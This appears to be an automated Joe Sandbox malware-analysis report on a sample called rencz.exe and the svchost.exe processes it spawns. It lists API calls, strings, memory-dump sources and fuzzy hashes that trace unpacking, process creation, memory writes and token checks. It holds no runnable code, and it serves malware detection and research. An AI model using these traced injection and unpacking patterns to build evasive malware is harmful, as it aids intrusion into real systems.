Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 1fb942ef013606f88d351335b9fb34389f43df3e22e2b512ce45d0f6972a8371
Instruction ID: 90bc34a9409dbd1e8bc425db015cc87e903f12472cf9668eceeff98528558c10
Opcode Fuzzy Hash: 1fb942ef013606f88d351335b9fb34389f43df3e22e2b512ce45d0f6972a8371
Instruction Fuzzy Hash: B1110DB6D50609ABDF11DFF58944BAEBBFCBB48251F109465E608E2200E77186548BB8

Uniqueness

Uniqueness Score: -1.00%

Function 02531404 Relevance: 5.1, APIs: 4, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0253146A
HeapFree.KERNEL32(00000000), ref: 02531471
GetProcessHeap.KERNEL32(00000000,?), ref: 0253147E
HeapFree.KERNEL32(00000000), ref: 02531485

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: b7c3afd9e10434815f884d94467d69ccb183625c72135cf179768fe8044d3804
Instruction ID: b76f121309f742a383d58426618a495f8d89bc339e70396a2734544cb7266df3
Opcode Fuzzy Hash: b7c3afd9e10434815f884d94467d69ccb183625c72135cf179768fe8044d3804
Instruction Fuzzy Hash: 571142B2D00609ABCB019FF589447EEFBBCBF09214F009466E509E2100D77196048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02531F56 Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02531CD5: GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02531CFD
Part of subcall function 02531CD5: RtlAllocateHeap.NTDLL(00000000), ref: 02531D04
Part of subcall function 02531CD5: lstrcpy.KERNEL32(00000000,00000000), ref: 02531D2D
Part of subcall function 02531CD5: GetProcessHeap.KERNEL32(00000000,?), ref: 02531DF6
Part of subcall function 02531CD5: HeapFree.KERNEL32(00000000), ref: 02531DFD
Part of subcall function 02531CD5: Sleep.KERNEL32(00001388), ref: 02531E08

GetProcessHeap.KERNEL32(00000000,?), ref: 02531FB4
HeapFree.KERNEL32(00000000), ref: 02531FBB
GetProcessHeap.KERNEL32(00000000,?), ref: 02531FC3
HeapFree.KERNEL32(00000000), ref: 02531FCA

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpy
String ID:
API String ID: 1268735806-0
Opcode ID: 21c05e894ae540916aa4d02625f048f4e4f625d5335f57c9ab21aba0f5ac15f6
Instruction ID: afea1fcedc7db327bbb184b8f9e40529a94954e1a0e3957187da83df6efab11f
Opcode Fuzzy Hash: 21c05e894ae540916aa4d02625f048f4e4f625d5335f57c9ab21aba0f5ac15f6
Instruction Fuzzy Hash: 3401C0B18083059FC711DF65D944A5BBBE8FF4C314F04591EF599D2200D735E6189FAA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rencz.exePID: 6540, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	70.7%
Signature Coverage:	0%
Total number of Nodes:	205
Total number of Limit Nodes:	12

Executed Functions

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(fail 3), ref: 004010EE
NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00401122
OutputDebugStringA.KERNEL32(fail 2), ref: 00401133

Strings

fail 3, xrefs: 004010E9
fail 2, xrefs: 0040112E
Start, xrefs: 00401167
Stop Err, xrefs: 00401187
fail 1, xrefs: 0040114E
Stop ok, xrefs: 00401180

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: DebugOutputString$CreateProcessUser
String ID: Start$Stop Err$Stop ok$fail 1$fail 2$fail 3
API String ID: 976970837-1310772363
Opcode ID: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction ID: 243eedd8a4f49eb320fdfb0d7e1e77221009fbf540129bad84db16ccdf4411bb
Opcode Fuzzy Hash: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction Fuzzy Hash: 1421CA32605209BBCB055F94DD01E9A3F29EB0C725B214237FE00B61F4DA7AC960AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00422152 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,00421C5E), ref: 00422236
VirtualAlloc.KERNEL32(00000000,000001A9,00003000,00000040,00421C98), ref: 0042226D
VirtualAlloc.KERNEL32(00000000,0000B2A2,00003000,00000040), ref: 004222CD
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422303
VirtualProtect.KERNEL32(00400000,00000000,00000004,0042212D), ref: 00422412
VirtualProtect.KERNEL32(00400000,00001000,00000004,0042212D), ref: 00422439
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D), ref: 004224FF
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D,?), ref: 00422555
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422579

Memory Dump Source

Source File: 00000004.00000002.1251333078.0000000000421000.00000040.00000001.01000000.00000005.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_421000_rencz.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 825025660836190913fdd1bb514e6233e9fadebdfec7ebde24a9587a44909d83
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 2FD19E72700100AFEB14EF54CD80F6277A6FF68310B890295ED0D9F26ADB74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 006F04F4 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,006F0000), ref: 006F05D8
VirtualAlloc.KERNELBASE(00000000,000001A9,00003000,00000040,006F003A), ref: 006F060F
VirtualAlloc.KERNELBASE(00000000,0000B2A2,00003000,00000040), ref: 006F066F
VirtualFree.KERNELBASE(00710000,00000000,00008000), ref: 006F06A5
VirtualProtect.KERNELBASE(00400000,00009000,00000004,006F04CF), ref: 006F07B4
VirtualProtect.KERNEL32(00400000,00001000,00000004,006F04CF), ref: 006F07DB

Part of subcall function 006F03A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 006F03DA

VirtualProtect.KERNELBASE(00400000,?,00000002,006F04CF), ref: 006F08A1
VirtualProtect.KERNELBASE(00400000,?,00000002,006F04CF,?), ref: 006F08F7
VirtualFree.KERNELBASE(00710000,00000000,00008000), ref: 006F091B

Memory Dump Source

Source File: 00000004.00000002.1251491670.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_rencz.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: f948f566381ca0f595c14c07fe2ada2e2da929fbb52514a1d9b6d335d2e1dd9c
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 38D15C727002009FFF15EF54CC80F6177A6FF64710B990298EE0D9F66ADA70A921CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,75539350,00003000,00000004), ref: 004015DB

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction ID: 5f65e376ed05142d156b79c11863de9d8c1410112659dc892d0819c29325736b
Opcode Fuzzy Hash: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction Fuzzy Hash: 71E0EC7556020CBBEF01CF90DD46FE977BCEB00715F104150B904D6090D775AB149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040160F Relevance: 1.5, APIs: 1, Instructions: 16
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(00401692,00000000,00000000,?,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction ID: 5a808b04aabe2117a938e4500ca1c1b9b1ef177e0b005ac0e652288855810eb1
Opcode Fuzzy Hash: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction Fuzzy Hash: 78D0C93255410DBFCF029FA4DD05CAA7B6EFB09211B004665FE29D2060D6329A34AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015EE Relevance: 1.5, APIs: 1, Instructions: 15
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(00000044,?,00000010,?,004010CF), ref: 00401602

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction ID: 2a43cff2ce15a73ccafebcd56fae5865f2d1f9501d48921ddcbb68ebc334f4a9
Opcode Fuzzy Hash: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction Fuzzy Hash: C1D0C93205410EBFDF019FA0DD05CEA3B6DEB05255B004121FA19D1060E632D6699B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70
sleepprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040100A
StrStrIA.KERNELBASE(00000000, /u), ref: 00401018
Sleep.KERNEL32(00001388), ref: 00401027
ExitProcess.KERNEL32 ref: 00401039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040107F
SetCurrentDirectoryW.KERNEL32(?), ref: 0040108C
lstrcatW.KERNEL32(?,?), ref: 004010A7
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010C3

Strings

/u, xrefs: 00401012

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: DirectoryProcess$CommandCreateCurrentExitLineSleepSystemlstrcat
String ID: /u
API String ID: 4042104365-4118749740
Opcode ID: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction ID: 96ee623e9da2e0af38eded0e061056f2ac1dfe5269435d034bd7705fbe78fb85
Opcode Fuzzy Hash: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction Fuzzy Hash: 36115472802619ABDB20AFB1DD0DEDE7B7CAF08705F10003AF605F20A5D63897458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB5 Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040157D,00000000,00000000,00000000,?,530C1AEE,004020E8), ref: 00401CC2
RtlFreeHeap.NTDLL(00000000,?,530C1AEE,004020E8), ref: 00401CC9

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction ID: de2e74cc2c5d9c26438789ecc4f5efd00e9e3bcaa0604652a6375203050d3e1d
Opcode Fuzzy Hash: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction Fuzzy Hash: E3C04C31449240FBEF015F909B0CB0A7ABDAB84743F008468F149A11A486748944DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401C79 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,?,00401D53,00001000,00000000,00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C7F
RtlAllocateHeap.NTDLL(00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C86

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction ID: bbb82e670732032ebf8e303bc8a39f8b906a07d9cff939e05880545c35f94fa9
Opcode Fuzzy Hash: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction Fuzzy Hash: 9EB00275546240EBDE416FE59F0DA097E7DBB84743F008454B349E5064CA758514DB25

Uniqueness

Uniqueness Score: -1.00%

Function 006F03A1 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 006F03DA

Memory Dump Source

Source File: 00000004.00000002.1251491670.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_rencz.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: 4efb9989debf279804fda9ebfbc3a7adc168a40524e05046df3c7abe0d84edb1
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: 5801B573A0411EABFB208A19DC40BBA739AEFD5720F29C525EA05E7342C674DC0245A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401593 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00401442,00401295), ref: 004015AA

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction ID: 98ea57f8acb340bf8185d7c41957bfe50ebb8c53553d8a1b8998a7004bdb3259
Opcode Fuzzy Hash: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction Fuzzy Hash: 47D05E33C0830C5ACB04EBF19A0E8CD77FC9B0C214F1004A6E505B2080FA76EA5883A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401264 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000, /p=,00401033,00000000), ref: 0040126D
StrToIntA.SHLWAPI(-00000004), ref: 0040127B
GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe,00000104), ref: 004012A1

Strings

/p=, xrefs: 00401264
C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe, xrefs: 0040129A

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /p=$C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe
API String ID: 514040917-89750014
Opcode ID: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction ID: a97e36b21e4f6c4b508bbe1c7bc1ce47f756939332ff9af57f8a63180c09d7ad
Opcode Fuzzy Hash: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction Fuzzy Hash: EAE048B068130177EA502F719E0FB156A985B08B4FF544476BA45F41F5DAFCC241451D

Uniqueness

Uniqueness Score: -1.00%

Function 004234A8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 396COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00432918,0000015C), ref: 0042358F
__aulldiv.LIBCMT ref: 00423916
__common_dcos_data.LIBCMT ref: 0042393C
__common_dcos_data.LIBCMT ref: 00423998

Strings

uTB, xrefs: 00423517, 00423545, 0042354B, 0042359B, 00423642, 0042365C, 00423722, 00423842, 00423866, 0042388F, 004238C3, 004238CA, 00423935, 00423961, 00423A0E

Memory Dump Source

Source File: 00000004.00000002.1251333078.0000000000421000.00000040.00000001.01000000.00000005.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_421000_rencz.jbxd

Similarity

API ID: __common_dcos_data$DirectoryWindows__aulldiv
String ID: uTB
API String ID: 3713252173-3950955333
Opcode ID: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction ID: ec485fc663059ce4ae46598323261169b09f174663d50ce322c37d4fa9724364
Opcode Fuzzy Hash: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction Fuzzy Hash: 76E1D2727003229BC718DF38EDA06E537A2EB98719F59813BD800C73E5E678AD45879D

Uniqueness

Uniqueness Score: -1.00%

Function 00401305 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,0040128B), ref: 0040130B
RtlAllocateHeap.NTDLL ref: 00401387

Strings

NTDLL.DLL, xrefs: 00401306

Memory Dump Source

Source File: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1251150246.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251207326.0000000000402000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251232696.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1251254783.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rencz.jbxd

Yara matches

Similarity

API ID: AllocateHandleHeapModule
String ID: NTDLL.DLL
API String ID: 3205619-1613819793
Opcode ID: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction ID: 661fe251d33bcd873fe0306d0fa480983da9c30ce6244cc3b298440f3ea03910
Opcode Fuzzy Hash: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction Fuzzy Hash: 5E213EA5B9079479E13025761E8EF2759AD85E6F99360817FBB04B21D6D8FC4C04C06C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 6860, Parent PID: 6540COMMON

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	631
Total number of Limit Nodes:	9

Executed Functions

Function 02692BA4 Relevance: 3.1, APIs: 2, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02692BDA
NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02692C23

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 38cc3c65e8502f02dc277decd5d182f28125229e6313abc346c1f2d86ee088c1
Instruction ID: 3df7683b99175ea4130ee3958ff9c8ed529bb26893056e4376eb72a041c06c29
Opcode Fuzzy Hash: 38cc3c65e8502f02dc277decd5d182f28125229e6313abc346c1f2d86ee088c1
Instruction Fuzzy Hash: 8911E775910205EFCF09CF98C964EE937B8EF49324F1542ACE9254B291DF30AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0269338D Relevance: 19.7, APIs: 13, Instructions: 156
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,0000011C), ref: 026933BE
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 026933E0
GetLastError.KERNEL32 ref: 026933E2
GetProcessHeap.KERNEL32(00000008,?), ref: 02693401
RtlAllocateHeap.NTDLL(00000000), ref: 02693408
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,?), ref: 02693428
GetSidIdentifierAuthority.ADVAPI32(?), ref: 02693448
GetSidSubAuthorityCount.ADVAPI32(?), ref: 0269346B
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02693480
GetSidSubAuthority.ADVAPI32(?,?), ref: 02693497
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0269351A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02693527
HeapFree.KERNEL32(00000000), ref: 0269352E

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: AuthorityHeap$ProcessToken$Information$AllocateChangeCloseCountErrorFindFreeIdentifierLastNotificationOpen
String ID:
API String ID: 3355550324-0
Opcode ID: 16e1935baad89414da6befe750e5b135dc087ff13612b74f4ea015760cacc367
Instruction ID: ade21635b088b710b18c0efe02db4261c27fffb61df16481b226d50be84ad7d6
Opcode Fuzzy Hash: 16e1935baad89414da6befe750e5b135dc087ff13612b74f4ea015760cacc367
Instruction Fuzzy Hash: C651B0715453019FDB228F28C849B6EBBACFF46714F194988F48887351CF31D5A9DB62

Uniqueness

Uniqueness Score: -1.00%

Function 02693555 Relevance: 15.1, APIs: 10, Instructions: 76
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02693570
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02693585
GetLastError.KERNEL32 ref: 0269358B
GetProcessHeap.KERNEL32(00000008,00000001), ref: 026935A1
RtlAllocateHeap.NTDLL(00000000), ref: 026935A8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 026935C1
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 026935CF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 026935F0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 026935FD
HeapFree.KERNEL32(00000000), ref: 02693604

